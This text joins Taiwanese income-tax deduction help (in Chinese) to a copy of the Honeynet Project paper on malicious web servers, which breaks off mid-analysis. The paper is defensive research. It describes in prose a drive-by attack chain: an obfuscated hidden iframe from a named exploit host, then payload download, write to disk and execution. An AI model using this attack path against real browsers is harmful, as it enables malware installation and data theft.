請依您的所得逐筆申報

扣除額

扣除額維護。
什麼是扣除額？

扣除額包括一般扣除額及特別扣除額。

一般扣除額：分標準扣除額及列舉扣除額二種，需擇一填報減除，二者不得併用。經選定填明適用標準扣除額者，或因未填列列舉扣除額亦未填明適用標準扣除額，經依規定視為已選定適用標準扣除額者，以及未辦理結算申報者，經稽徵機關核定後，不得要求變更適用列舉扣除額。
標準扣除額：單身者扣除46,000元，夫妻合併申報者，扣除92,000元。
列舉扣除額：請參閱列舉扣除額。
特別扣除額：
薪資所得特別扣除額：納稅義務人及與其合併申報的個人有薪資所得者，每人可扣除78,000元，全年薪資所得未達78,000元者，僅得就其全年薪資所得總額全數扣除。
財產交易損失扣除額：本人、配偶及申報受扶養親屬的財產交易損失（須檢附有關證明損失的文據），每年度扣除額，以不超過當年度申報的財產交易所得為限。當年度無財產交易所得可資扣除或扣除不足者，得以以後3年度的財產交易所得扣除。財產交易損失的計算，參照：所得資料(8)財產交易所得的計算。
儲蓄投資特別扣除額：本人及與其合併報繳的配偶暨受扶養親屬於金融機構的存款利息、儲蓄性質信託資金的收益(扣繳憑單格式代號為5A者)及87年12月31日以前取得公開發行並上市的緩課記名股票，於轉讓、贈與或作為遺產分配、放棄適用緩課規定或送存集保公司時的營利所得(緩課股票轉讓所得申報憑單格式代號為71M者)，合計全年不超過27萬元者，得全數扣除，超過27萬元者，以27萬元為限。但依郵政儲金匯兌法規定免稅的存簿儲金利息、依所得稅法規定分離課稅的公債、公司債、金融債券、短期票券利息及依金融資產證券化條例或不動產證券化條例規定分離課稅的受益證券或資產基礎證券利息不包括在內。
殘障特別扣除額：本人、配偶及申報受扶養親屬為殘障者（須檢附殘障手冊或身心障礙手冊影本），或精神衛生法第5條第2項規定的病人（須檢附專科醫生的嚴重病人診斷證明書影本，不得以重大傷病卡代替），每人可減除77,000元。
教育學費特別扣除額：納稅義務人申報扶養的子女就讀學歷經教育部認可大專以上院校的子女教育學費（須檢附繳費收據影本或證明文件）每一申報戶每年可扣除25,000元，不足25,000元者，以實際發生數為限，已接受政府補助或領有獎學金者，應以扣除該補助或獎學金的餘額在上述規定限額內列報。但就讀空大、空中專校及五專前3年者不適用本項扣除額。

列舉扣除

列舉扣除資料維護。
什麼是列舉扣除額?

下述各種費用有確實的證明或收據，且不超過法定限額部分，可申報減除。

捐贈：
對合於民法總則公益社團及財團的法人組織或依其他關係法令，經向主管機關登記或立案成立的教育、文化、公益慈善機構或團體的捐贈，及依法成立、捐贈或加入符合規定的公益信託之財產，以不超過綜合所得總額20％為限。但有關國防勞軍的捐贈、對政府的捐獻，及依文化資產保存法規定出資贊助維護或修復古蹟、古蹟保存區內建築物及歷史建築的贊助款，不受金額限制。須附收據正本供核。以購入的土地或符合殯葬管理條例設置的骨灰（骸）存放設施捐贈者，應檢附A.受贈機關、機構或團體開具領受捐贈的證明文件B.購入該捐贈土地或骨灰（骸）存放設施的買賣契約書及付款證明，或其他足資證明文件。自94年7月8日起以未上市（櫃）公司股票捐贈者，應取具受贈單位載有於96年度股票出售價金的收據或證明文件。

保險費：
本人、配偶及申報受扶養直系親屬的人身保險（包括人壽保險、健康保險、傷害保險及年金保險）的保險費（含勞保、就業保險、軍公教保險、農保、學生平安保險），被保險人與要保人應在同一申報戶內，每人每年扣除24,000元，實際發生的保險費未達24,000元者，就其實際發生額全數扣除。但本人、配偶及申報受扶養直系親屬的全民健康保險之保險費，由納稅義務人本人、合併申報的配偶或受扶養親屬繳納者，得不受金額限制，全數扣除。須檢附收據正本或保險費繳納證明書正本，由機關或事業單位彙繳的員工保險費（由員工負擔部分），應檢附服務單位填發的證明。

醫藥及生育費：
本人、配偶及申報受扶養親屬的醫藥和生育費用，以付與公立醫院、公務人員保險特約醫院、勞工保險特約醫療院、所、全民健康保險特約醫院及診所或經財政部認定其會計紀錄完備正確的醫院者為限，受有保險給付部分，不得扣除。須檢附填具擡頭的單據正本，單據已繳交服務機關申請補助者，須檢附經服務機關證明的該項收據影本。

災害損失：
本人、配偶及申報受扶養親屬遭受不可抗力的災害，如地震、風災、水災、旱災、火災等損失，受有保險賠償或救濟金部分，不得扣除。須檢附稽徵機關（國稅局所屬分局、稽徵所及服務處）於災害發生後調查核發的災害損失證明。

自用住宅購屋借款利息：
納稅義務人購買自用住宅向金融機構辦理借款的利息支出 (ZK)，應符合下列各要件：
房屋登記為本人、配偶或受扶養親屬所有。
本人、配偶或受扶養親屬於96年度在該地址辦竣戶籍登記（以戶口名簿影本為證），且無出租、供營業或執行業務者使用。
取具96年度支付該借款的利息單據正本。
如屬配偶所有的自用住宅，其由納稅義務人向金融機構借款所支付的利息，以納稅義務人及配偶為同一申報戶，始可列報。
二個門牌的房屋打通者，僅能選擇其中一屋列報。
購屋借款利息的扣除，每一申報戶以一屋為限，並以當年實際支付的該項利息支出減去儲蓄投資特別扣除額（ZD）後的餘額，申報扣除，每年扣除額不得超過30萬元，即0≦ZK－ZD≦300,000元。
利息單據上如未載明該房屋的坐落地址、所有權人、房屋所有權取得日、借款人姓名或借款用途，應由納稅義務人自行補註及簽章，並提示建物權狀及戶籍資料影本。
以「修繕貸款」或「消費性貸款」名義借款者不得列報扣除，惟如確係用於購置自用住宅並能提示相關證明文件如所有權狀、建築物登記簿謄本等，仍可列報。如因貸款銀行變動或換約者，僅得就原始購屋貸款未償還額度內支付的利息列報，應提示轉貸的相關證明文件，如原始貸款餘額證明書、清償證明書或建築物登記謄本手抄本及建物異動清單或建物索引（須含轉貸或換約前後資料）等影本供核。
　

房屋租金支出：
本人、配偶及申報受扶養直系親屬在中華民國境內租屋供自住且非供營業或執行業務使用，所支付的租金，每一申報戶每年扣除數額以12萬元為限。但申報有購屋借款利息者，不得扣除。並應檢附：A.承租房屋的租賃契約書及支付租金的付款證明影本（如：出租人簽收的收據、自動櫃員機轉帳交易明細表或匯款證明）。B.本人、配偶或申報受扶養直系親屬於課稅年度於承租地址辦竣戶籍登記的證明，或納稅義務人載明承租的房屋於課稅年度內係供自住且非供營業或執行業務使用的切結書。
　

依政治獻金法規定之捐贈：
依政治獻金法規定，個人對同一擬參選人每年捐贈總額不得超過10萬元，且每一申報戶每年對各政黨、政治團體及擬參選人捐贈的扣除總額，不得超過各該申報戶當年度申報的綜合所得總額20％，其金額並不得超過20萬元。但對於未依法登記為候選人或登記後其候選人資格經撤銷者的捐贈或收據格式不符者，不予認定。
對政黨的捐贈，政黨推薦的候選人於93年度立法委員選舉平均得票率未達2％者（96年度因未辦理立法委員選舉，故以上次（93年度）選舉的得票率為準，其中得票率達2％者為中國國民黨、民主進步黨、親民黨、臺灣團結聯盟及無黨團結聯盟）或收據格式不符者，不予認定。

公職人員選舉罷免法規定之競選經費：
候選人自選舉公告日起至投票日後30日內，所支付與競選活動有關的競選經費，於規定最高限額內減除接受捐贈後的餘額，可列報扣除。應檢附文件：A.開立政治獻金專戶收受政治獻金者，應檢附向監察院申報的會計報告書影本及經監察院審核完竣的擬參選人政治獻金收支結算表。B.未開立政治獻金專戶收受政治獻金者，應依政治獻金法第18條第3項第2款規定項目將競選經費分別列示，並檢附競選經費支出憑據或證明文件。（第7屆立法委員候選人的競選經費支出，應依96年11月7日修正公布公職人員選舉罷免法第42條規定，於98年申報97年度（即投票日年度）的綜合所得稅時列舉扣除）

私立學校法第51條規定的捐贈：
個人透過財團法人私立學校興學基金會，對私立學校的捐款，金額不得超過綜合所得總額50％，須檢附收據正本以供查核。
以上這些實際支付或損失數額，叫做「實際發生的金額」，但並不一定全部可以扣除，例如沒有確實的證明或收據者，或即使證明、收據齊全，而超過一定比例的超限部分，均不可以扣除，經減去這些不可以扣除的數額後，就是「依法可以扣除的金額」。

投資抵減稅額

投資抵減稅額維護。
什麼是投資抵減稅額？（須檢附投資抵減稅額證明書或餘額表）

個人依88年12月31日修正前促進產業升級條例第8條及獎勵民間參與交通建設條例第33條規定，原始認股或應募政府指定的重要科技事業、重要投資事業、創業投資事業或參與交通建設民間機構因創立或擴充而發行的記名股票，持有時間達2年以上者，得以其取得該股票價款20％限度內，抵減當年應納綜合所得稅額(AF)。當年度不足抵減時，得在以後4年度內抵減；其投資於創業投資事業的抵減金額，以不超過該事業實際投資科技事業金額占該事業實收資本額比例的金額為限。

個人依88年12月31日修正後促進產業升級條例第8條規定，原始認股或應募屬新興重要策略性產業發行的記名股票，持有時間達3年以上者，得以取得該股票價款依規定抵減率計算限度內，抵減自當年度起5年內應納綜合所得稅額(AF)。

上述每一年度抵減總額，不得超過當年度應納綜合所得稅額(AF)50％，但最後年度不在此限。

重購自用住宅

重購自用住宅維護。
什麼是重購自用住宅之扣抵稅額?

納稅義務人出售自用住宅房屋所繳納該財產交易所得部分的所得稅額，自完成移轉登記日起2年內，如重購自用住宅房屋其價額超過原出售價額者，得於重購自用住宅房屋完成移轉登記的年度，自其應納所得稅額中扣抵或退還，但原財產交易所得已自財產交易損失中扣抵部分不在此限。此項規定於先購後售者亦適用。
自用住宅房屋指所有權人或配偶、申報受扶養直系親屬於該地址辦竣戶籍登記，且於出售前一年度內無出租或供營業用的房屋，須檢附出售及重購年度的戶口名簿影本。
應檢附重購及出售自用住宅房屋的買賣契約(可附向地政機關辦理移轉登記蓋有收件章之契約文件影本代替)及所有權狀影本，用以證明重購的價格高於出售的價格，及產權登記的時間相距在兩年以內。併同申請扣抵或退還年度之綜合所得稅結算申報書，向戶籍所在地稽徵機關(國稅局所屬分局、稽徵所)辦理。
可申請扣抵或退還之綜合所得稅額，係指出售該年度(以所有權完成移轉登記日所屬年度為準)綜合所得稅確定時，因增列該財產交易所得後所增加之綜合所得稅額。
申請扣抵或退還年度，先售後購者，為重購之所有權移轉登記年度；先購後售者，為出售之所有權移轉登記年度。

大陸地區所得稅扣抵

大陸地區所得稅扣抵
大陸地區來源所得可扣抵稅額及免稅額、扣除額之申報注意事項：

申報者若有有大陸地區來源所得，應將所得發生處所名稱，併同台灣地區來源所得，登打輸入於所得資料頁中，再於本頁(A)項輸入大陸地區來源所得總額，然後於(C)項中，輸入不含大陸地區來源所得之應納稅額，經系統計算可得(D)項大陸地區來源所得之應納稅額；並於(E)項輸入大陸地區已繳納所得稅額，最後系統計算得(F)項可扣抵稅額。請注意！若無大陸地區所得，此頁資料不必輸入。相關法規說明如下：
　

有大陸地區來源所得，應將所得發生處所名稱、地址及所得額詳細填列，併同臺灣地區來源所得課徵所得稅。
在大陸地區已繳納的所得稅（含扣繳及自繳）得自應納稅額中扣抵。扣抵的數額，不得超過因加計其大陸地區所得，而依其適用稅率計算增加的應納稅額，應檢附先送經行政院設立或指定的機構或委託的民間團體（目前為財團法人海峽交流基金會）驗證後的大陸地區完納所得稅證明文件，供稽徵機關核認。
申報大陸地區配偶、扶養親屬的免稅額者，應檢附居民身份證影本及當年度親屬關係證明，申報扶養的子女、同胞兄弟姊妹年滿20歲仍在校就學、身心殘障或無謀生能力者，應另檢具在學證明或身體傷殘、精神障礙、智能不足、重大疾病等的證明；扣除額部分，應檢附足資證明的文件。前述證明文件係指大陸地區公證處所核發的公證書，納稅義務人逐次取得所得年度有關的公證書，須先送經行政院設立或指定的機構或委託的民間團體（目前為財團法人海峽交流基金會）驗證後，供稽徵機關核認。

20080116

下午4:18:00

Know Your Enemy:
Malicious Web Servers

The Honeynet Project
http://www.honeynet.org

Christian Seifert – The New Zealand Honeynet Project
Ramon Steenson – The New Zealand Honeynet Project
Thorsten Holz – The German Honeynet Project
Bing Yuan – The German Honeynet Project
Michael A. Davis – The Honeynet Project

Last Modified:9 August 2007

INTRODUCTION

Today, many attackers are part of organized crime with the intent to defraud their victims. Their goal is to deploy malware on a victim's machine and to start collecting sensitive data, such as online account credentials and credit card numbers. Since attackers have a tendency to take the path of least resistance and many traditional attack paths are barred by a basic set of security measures, such as firewalls or anti-virus engines, the 「black hats」 are turning to easier, unprotected attack paths to place their malware onto the end user's machine. They are turning to client-side attacks.

In this paper, we examine these client-side attacks and evaluate methods to defend against client-side attacks on web browsers. First, we provide an overview of client-side attacks and introduce the honeypot technology that allows security researchers to detect and examine these attacks. We then proceed to examine a number of cases in which malicious web servers on the Internet were identified with our client honeypot technology and evaluate different defense methods. We conclude with a set of recommendations that one can implement to make web browsing safer.

Besides providing the information of this paper, we also make the tools and data freely available on our web site (http://www.nz-honeynet.org/capture.html and http://www.nz-honeynet.org/kye/mws/ complete_data_set.zip). We hope that these tools and the data enable the security community to easily become involved in studying the phenomenon of malicious servers. In section 「Future Work」, we list some research opportunities that we see in this field.

CLIENT-SIDE ATTACKS

In order to understand client-side attacks, let us briefly describe server-side attacks that we can contrast to client-side attacks. Servers expose services that clients can interact with. These services are accessible to clients that would like to make use of these services. As a server exposes services, it exposes potential vulnerabilities that can be attacked. Merely running a server puts oneself at risk, because a hacker can initiate an attack on the server at any time. For example, an attacker could send a maliciously crafted HTTP request to a vulnerable web server and attempt to leverage errors or other unexpected application behavior.

Client-side attacks are quite different. These are attacks that target vulnerabilities in client applications that interact with a malicious server or process malicious data. Here, the client initiates the connection that could result in an attack. If a client does not interact with a server, it is not at risk, because it doesn't process any potentially harmful data sent from the server. Merely running an FTP client without connecting to an FTP server, for example, would not allow for a client-side attack to take place. However, simply starting up an instant messaging application application potentially exposes the client to such attacks, because clients are usually configured to automatically log into a remote server.

A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system. Client-side attacks are not limited to the web setting, but can occur on any client/server pairs, for example e-mail, FTP, instant messenging, multimedia streaming, etc. Client-side attacks currently represent an easy attack vector because most attention in protection technology has been focused on the protection of exposed servers from remote attackers. Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect limited set of client technologies.

server honeypot

Figure 1 - Traditional server honeypot being attacked by a 「black-hat」

client honeypot

Figure 2 - Client honeypot

SERVER HONEYPOTS VS. CLIENT HONEYPOTS

Traditional honeypot technology is server based and not able to detect client-side attacks. A low interaction honeypot like Honeyd, or a high interaction honeynet system with the Roo Honeywall, acts as a server, exposeing some vulnerable services and passively waiting to be attacked (Figure 1). However, to detect a client-side attack, a system needs to actively interact with the server or process malicious data. A new type of honeypot is therefore needed: the client honeypot. Client honeypots crawl the network, interact with servers, and classify servers with respect to their malicious nature (Figure 2).

The main differences between a client-side honeypot and traditional honeypot are:

client-side: it simulates/drives client-side software and does not expose server based services to be attacked.
active: it cannot lure attacks to itself, but rather it must actively interact with remote servers to be attacked.
identify: whereas all accesses to the traditional honeypot are malicious, the client-side honeypot must discern which server is malicious and which is benign.

Similarly to traditional server honeypots, there are two types of client honeypots: low and high interaction client honeypots. The low interaction client honeypot uses a simulated client (for example HoneyC or wget in the case of a browser-based client honeypot), interacts with servers, and classifies the servers based on some established definition of 「malicious」 activity. Usually this is performed via static analysis and signature matching. Low interaction client honeypots have the benefit of being quite fast, but can produce false alerts or miss a malicious server, especially since they do not act like a 「real」 client and have programmatic limitations. They may also fail to fully emulate all vulnerabilities in a client application. The other type of client honeypot, the high interaction client honeypot, takes a different approach to make a classification of malicious activity. Using a dedicated operating system, it drives an actual vulnerable client to interact with potentially malicious servers. After each interaction, it checks the operating system for unauthorized state changes. If any of these state changes are detected, the server is classified as malicious. Since no signatures are used, high interaction client honeypots are able to detect unknown attacks.

In this paper, we are looking at malicious web servers that attack web browsers. Attacks on web browsers by malicious web servers seem to be the most prominent client-side attack type today, but they are still not well understood. The goal of our work is to assess the threat to web browser client applications from malicious web servers with a high interaction client honeypot. We chose to use a high interaction client honeypot, because it allows us to obtain information about attacks that are unknown or obfuscated in a way that low interaction client honeypots could not detect. We obtain and present information on malicious web servers, evaluate several defense mechanisms, and make recommendations on how to protect systems against these malicious web servers.

IDENTIFICATION OF MALICIOUS WEB SERVERS

We identified malicious web servers with the high interaction client honeypot Capture-HPC. Capture-HPC is an open source client honeypot developed by Victoria University of Wellington in conjunction with the New Zealand Honeynet Project. This high interaction client honeypot monitors the system at various levels:

registry modifications to detect modification of the Windows registry, like new or modified keys
file system modifications to detect changes to the file system, like files created or deleted files, and
creation/destruction of processes to detect changes in the process structure.

Client honeypot instances are run within a VMware virtual machine. If unauthorized state changes are detected - in other words when a malicious server is encountered - the event is recorded and the virtual machine is reset to a clean state before interacting with the next server. (Appendix A contains download details as well as a detailed description of the tool's functionality and underlying technical aspects).

With our focus on unauthorized state changes to identify a malicious server, we are narrowing our view to a particular type of malicious server: the ones that can alter the state of the client without user consent or interaction, which usually means that the server is able to control and install malware on the client machine without the user noticing such actions. These attacks are commonly referred to as drive-by-downloads. Many more types of malicious web servers do exist, which we excluded from this initial study. Some examples are phishing servers that try to obtain user sensitive data by imitating a legitimate site or transparent proxy, web servers that specialize in obtaining sensitive files, such as the browser history, from the client machines, and web servers that simply host malicious executables (that need to be explicitly downloaded and executed by a user). Capture-HPC is not suitable for detecting these types of malicious web servers. Rather, we concentrate on powerful malicious servers that take control of the client machine.

We collected our data in the first half of May 2007 using twelve virtual machine instances of Capture-HPC. These instances were connected to the security lab at Victoria University of Wellington, NZ, from which they had direct access to the Internet. No content filtering or firewalling was performed between the security lab and the Internet. Twelve instances of Windows XP SP2 with Capture-HPC V1.1 and Internet Explorer 6 SP2 were installed to interact with a list of web servers. The client honeypot instances were configured to ignore authorized state changes, such as write activity within the browser cache (the complete list of authorized events is included in our downloadable data set which is available at http://www.nz-honeynet.org/kye/mws/complete_data_set.zip). Besides the Softperfect Personal Firewall, which was configured to block any non-web related traffic and prevent potential malware from spreading, we did not install any additional patches, software or plug-ins, nor did we modify the configuration of the operating system or browser in any way to make it less secure, but rather we used the default settings from a routine installation of Windows XP SP2. We suspected that this configuration would solicit a high number of attacks, since many remote execution vulnerabilities, which enable a server to execute code on the client machine, are known and the corresponding exploits are publicly available. The intent was to gather a comprehensive data set of malicious URLs, some of which we would analyze in-depth.

We were not only interested in analyzing attacks in-depth, but also in gaining a general understanding about the risk of accessing the web with such a configuration, and learning whether there are areas of the Internet that are more risky than others. As a result, we categorized the web servers' URLs prior to inspection by our client honeypot. The following categories were used:

Content areas: These URLs point to content of a specific type or topic. They were obtained by issuing keywords of the specific content area to the Yahoo! Search Engine. Five different content areas were inspected:

Adult – pages that contain adult entertainment/pornographic material
Music – pages that contain information about popular artists and bands
News – pages that contain current news items or news stories in sports, politics, business, technology, and entertainment
User content – pages that contain user-generated content, such as forums and blogs
Warez – pages that contain hacking information, including exploits, cracks, serial numbers, etc.

Previously defaced/vulnerable web servers: These URLs point to pages of servers that have been previously defaced or run vulnerable web applications. We obtained the previously defaced sites from http://zone-h.org. A list of vulnerable web servers was generated by issuing Google Hack keywords to search engines.
Sponsored links: These URLs are a list of sponsored links encountered on the Google search engine results page. It was generated by collecting the links from the site http://googspy.com for various keywords.
Typo squatter URLs: These URLs are common typing mistakes of the 500 most popular sites from http://alexa.com (for example http://www.googel.com instead of http://www.google.com). The typo URLs were generated using Microsoft's StriderURLTracer.
Spam: These URLs were mined from several months' worth of Spam messages of the public Spam archive at http://untroubled.org/spam.

The list of URLs as well as the keywords used to obtain the URLs are included in our downloadable data set at http://www.nz-honeynet.org/kye/mws/complete_data_set.zip.

We inspected a little over 300,000 URLs from approximately 150,000 hosts in these categories (approximately 130,000 hosts when accounting for the overlap of hosts between categories. No significant overlap between URLs existed). Table 1 and Figure 3 show the detailed breakdown for the different categories and content areas. With each URL that was inspected by the client honeypot, we recorded the classification of the client honeypot (malicious or benign) as well as any unauthorized state changes that occurred in case an attack by a server was encountered (an example can be found as part of our in-depth analysis of the Keith Jarrett fan site). Unfortunately, we could not determine which vulnerability was actually exploited because analysis tools are still immature and not suitable for an automated analysis.

Category	Inspected Hosts	Inspected URLs
Adult	16,375	33,999
Music	13,106	49,269
News	21,188	47,224
User Content	24,331	45,835
Warez	23,530	44,870
Defacement/Vuln	4,844	5,151
Sponsored Links	17,179	42,092
Typo	22,902	22,912
Spam	5,481	11,460
Total	148,936	302,812

Table 1 - Input URLs/ hosts by category

Input URLs

Figure 3 - Input URLs by category

Using these input URLs, we identified a total of 306 malicious URLs from 194 hosts (No significant overlap of hosts or URLs exited). Simply retrieving any one of these URLs with the vulnerable browser caused an unauthorized state change that indicated the attack was successful, and that the server effectively gained control of the client machine. At that point, the server would be able to install malware or obtain confidential information without the user's consent or notice.

The percentage of malicious URLs within each category ranged from 0.0002% for previously defaced/vulnerable web servers to 0.5735% for URLs in the adult category. Table 2 shows the breakdown of the various categories. As is clear from these results, all categories contained malicious URLs. This is an important discovery as it means that anybody accessing the web is at risk regardless of the type of content they browse for or the way the content is accessed. Adjusting browsing behavior is not sufficient to entirely mitigate such risk. Even if a user makes it a policy to only type in URLs rather than following hyperlinks, they are still at risk from typo-squatter URLs. Likewise if a user only accesses hyperlinks or accesses links that are served up by search engines, they are still at risk. Nevertheless, there seem to be some categories that are riskier than others. A Chi-Square test (p<0.01) shows statistical significance between the adult category and Spam; also between Spam and any other category. In other words, there exists an elevated risk of attack when accessing adult content or links in Spam messages.

Category	Malicious Hosts	Malicious URLs	% Malicious URLs
Adult	102	195	0.5735
Spam	17	19	0.1658
Warez	19	27	0.0602
Typo	13	13	0.0567
News	15	20	0.0424
User Content	12	13	0.0284
Music	10	11	0.0223
Sponsored Links	4	7	0.0166
Defacement/Vuln	1	1	0.0002

Table 2 – Identified malicious URLs/ hosts by category

Identified malicious URLs

Figure 4 - Identified malicious URLs by category

We interacted with the 306 malicious URLs repeatedly over a three-week period and made several interesting observations. First, malicious URLs might not be consistently malicious. While one might expect that this is a result of a malicious advertisement that is only displayed occasionally on a page, we did observe some URLs that behaved sporadically that did not contain advertisements, but rather contained a static link to the exploit code. A malicious web page might solicit malicious behavior only once upon repeated interactions, but it also might just behave benign for a few times before it solicits malicious behavior again. We suspect that such behavior is intentionally employed on the malicious servers in order to evade detection, such as detection by our client honeypot. Furthermore, there are several attack kits that serve malicious content only once per visiting IP address. This is mainly done to disguise the attack. Second, over the three-week period we observed a decline in the number of servers that behaved maliciously from the original set of 306 URLs. It declined to 180 after two weeks and to 109 after the third week. This is not likely to be indicative of a declining trend of malicious URLs, but rather points to the dynamic nature of the malicious server landscape. Exploits are disappearing from URLs, but we suspect that they are reappearing on another page at the same time. Again, this measure is likely to be employed method of evading detection, but also to ensure that attacks are consistently being executed. Such a moving target is more difficult to hit.

DEFENSE EVALUATION

We evaluated various defensive methods with respect to their effectiveness against these malicious servers, namely blacklisting, patching, and using a different browser.

Blacklisting

First, we evaluated blacklisting as a method of defense. We inspected 27,812 URLs of known bad sites. These URLs originate from the well known hosts file from www.mvps.org for DNS blackholing on a Windows machine, and from the clearinghouse of stopbadware.org. A large number of 1,937 URLs successfully attacked our client honeypot running Internet Explorer 6 SP2. This is a percentage of 6.9646%. It appears that the providers of these lists know about malicious URLs that exist on the Internet. However, they only know a minority of malicious URLs. Checking which of the servers that we identified as malicious appear in the lists of known bad sites reveals that only 12% of malicious servers are known.

Does this mean that blacklisting is an ineffective method? In order to answer this question, we repeated our analysis of the 306 malicious URLs on a client honeypot that uses a DNS blackhole list, including the servers in the hosts file from www.mvps.org and the servers in the clearinghouse of stopbadware.org, and repeated our analysis. Considering that only 12% of the servers we identified as malicious were included in our blacklist, one would expect a remaining high number of malicious classifications by our client honeypot. Surprisingly, only one URL remained malicious. We conclude that blacklisting is indeed a very effective method to thwart these attacks.

To understand why blacklisting is an effective method, one needs to take a closer look at the exploits deployed on the URLs. Primarily, exploits are not found directly on a page, but are rather imported from a server (for example, via iframes, redirects, JavaScript client-side redirects, etc.) that specializes in providing exploits as shown in Figure 5. These are centralized machines that are likely to be referenced from numerous URLs. The blacklist that we used seems to include most of these centralized exploit servers, but not the malicious web server that the client initially contacted. Despite this lack of knowledge of the malicious web servers, the exploit can still be successfully blocked via the blacklist because the follow up request to the exploit server that resulted from the redirect is blocked. In the side boxes on in-depth analysis, we take a closer look at the relationship between the input URL and the imported exploits of a specific site.

Central Exploit Server

Figure 5 - Central Exploit Server

Patching

Second, we evaluated whether patching is an effective method to defend against malicious web servers. All malicious URLs that we have encountered to date (this includes 47 malicious URLs that were submitted to the client honeypot via our SCOUT web service that allows for an online evaluation of suspicious URLs by our client honeypots) were evaluated once again with a fully patched (as of May 10th 2007) version of Internet Explorer 6. A total of 2,289 URLs were inspected; this resulted in 0 successful compromises.

Patching does seem to be very successful as a defense measure. This comes as no surprise because attackers tend to rely known exploits if there is a chance of success. And it appears that the odds of success using these older exploits are high, because a large user base still does not seem to use automatic patching on their systems, leaving them vulnerable. The current browser distribution from w3schools.com reveals that Internet Explorer 6 is still used by 38.1% of Internet users worldwide as of May 2007. Considering that Internet Explorer 7 has been pushed as a high security update by Microsoft for several months, there is an indication that a large number of these users probably do not have automatic updates turned on. Some portion of these 38.1% that do have automatic updates turned on have probably made a conscious decision not to update to Internet Explorer 7, but rather to just accept Internet Explorer 6 patches. Nevertheless, we suspect that many simply do not have automatic updates enabled.

Despite its great success as a defensive approach, patching still does not provide complete protection. There is certainly the risk of zero-day exploits that can successfully attack a fully patched version of a browser. In addition, there is the risk of exploits targeting publicly disclosed vulnerabilities for which no patch is currently available. Users of Internet Explorer 6 were in this position recently: in September 2006 due to the VML vulnerability and in March 2007 due to the ANI vulnerability. These vulnerabilities, which allowed for remote code execution, were publicly disclosed and were left unpatched for about one week. We suspect that malicious servers are quick to distribute such exploits as they are very effective and easily obtainable. To confirm this we will need to collect data with our client honeypot farm once a situation similar to the VML or ANI vulnerability arises in the future.

Different Browser

Internet Explorer 6 SP2 is known to be at risk of being attacked by malicious web servers. As the final piece of this study, we evaluated whether using a different browser would be an effective means to reduce the risk of attack. We compared three browsers: Internet Explorer 6 SP2, Firefox 1.5.0 and Opera 8.0.0. Common perception about Internet Explorer and Firefox is that Firefox is safe and Internet Explorer is unsafe. However, a review of the remote code execution vulnerabilities (primary source: SecurityFocus) that were publicly disclosed for Firefox 1.5 and Internet Explorer SP2 reveals that, in fact, more were disclosed for Firefox 1.5 (see Figure 6) indicating more the opposite is true.

Vulnerabilities

Figure 6 - Remote code execution vulnerabilities per browser

To determine which browser is actually safer to use, we set up our client honeypots to use these browsers to interact with the servers. Due to time constraints, we were not able to re-evaluate all 300,000 URLs with each browser, but we did reinspect the highly malicious category of adult content comprising approximately 30,000 URLs. As shown in Figure 7, these input URLs that resulted in a 0.5735% of successful compromises of Internet Explorer 6 SP2 did not cause a single successful attack on Firefox 1.5.0 or Opera 8.0.0. Particularly the results on Firefox 1.5.0 are surprising, considering the number of remote code execution vulnerabilities that were publicly disclosed for this browser and the fact that Firefox is also a popular browser. We can only speculate why Firefox wasn't targeted. We suspect that attacking Firefox is a more difficult task as it uses an automated and 「immediate」 update mechanism. Since Firefox is a standalone application that is not as integrated with the operating system as Internet Explorer, we suspect that users are more likely to have this update mechanism turned on. Firefox is truly a moving target. The success of an attack on a user of Internet Explorer 6 SP2 is likely to be higher than on a Firefox user, and therefore attackers target Internet Explorer 6 SP2.

Malicious Classifications

Figure 7 - Malicious classifications of adult content URLs per browser

IN-DEPTH ANALYSIS

During our study, we encountered many malicious URLs. We have analyzed a few representatives to provide insight on how these servers operate and what sort of harm they can pose to the victim. Please refer to the shaded boxes or feel free to skip ahead to summary and recommendations.

www.keithjarrett.it

Keith Jarret Fan Site
Figure 8 - The Keith Jarrett fan site

The Italian fan site of the jazz pianist and composer Keith Jarrett (http://www.keithjarrett.it) is a malicious site. We found this site by submitting the keyword 「Keith Jarrett」 from our music category to the Yahoo! search engine, which resulted in the return of this URL in the 15th place on the results list. The site itself is quite simple and is shown in Figure 8. It contains text, images, and links, but no rich media content. We chose this site for an in-depth analysis as it includes some typical aspects of a malicious server, such as obfuscation, exploit location on a central exploit provider server, and a typical example of the spyware that is being deployed upon successful exploitation. Besides these elements, it also contains some more advanced techniques that are targeted at a) hiding the attack and b) increasing the likelihood of attack success. Due to space limitations, we only show portions of data from this site, but do make the complete set available from our website at: http://www.nz-honeynet.org/kye/mws/keith_jarrett.zip.

The exploit that triggers upon visitation of the Keith Jarrett site is not directly contained on the page. We do, however, find a snippet of JavaScript code that 「imports」 the exploit from a different server onto the page. The snippet of code is shown in Figure 9 and initially doesn't give much away since it is obfuscated.

Figure 9 - Obfuscated JavaScript

Because the JavaScript code needs to be converted to clear text in order 「import」 the exploit, the decryption routine is included within the JavaScript code. This makes it easy to extract the clear text, which is shown in Figure 10. It is a simple hidden iframe that includes the page out.php from the server crunet.biz. From there, we observed several redirects and more obfuscation until we were able to view the actual exploit code.

Figure 10 - Clear value of obfuscated JavaScript

The obfuscation of the iframe code is one step we encountered frequently, targeted to hide the attack from static analysis tools, such as network based intrusion detection systems. On the Keith Jarrett site, we encountered an additional mechanism that was probably designed to evade detection. Our client honeypot was attacked by www.keithjarrett.it during the initial crawl. However, upon subsequent visits to the same URL, the exploit only triggered on occasion. We suspect that this is a measure to evade client honeypots like ours.

The exploit code itself (portions are shown in Figure 11 and Figure 12) contains some interesting aspects we would like to highlight. The attack code is a multi-step attack that first obtains the payload via the XMLHTTP object, writes it to disk via the ADODB (BID: 10514) object and then executes it with the WScript.Shell or Shell.Application object (BID: 10652). This attack path was disabled by Microsoft in 2004 and is not going to be successful unless an unpatched version of Internet Explorer 6 SP2 is used. The attack follows these three stages with each stage using error handling to increase the chances of the attack succeeding (for example, the usage of the Shell.Application object in case the WScript.Shell object fails).

Figure 11 - Exploit code - portion 1

